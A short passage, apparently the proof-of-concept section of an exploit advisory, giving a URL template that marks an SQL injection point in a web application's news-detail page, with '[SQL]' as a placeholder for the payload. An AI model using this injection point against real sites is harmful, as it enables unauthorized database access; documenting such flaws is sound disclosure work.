# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/news-detail/47[SQL]
#
#
# # # # #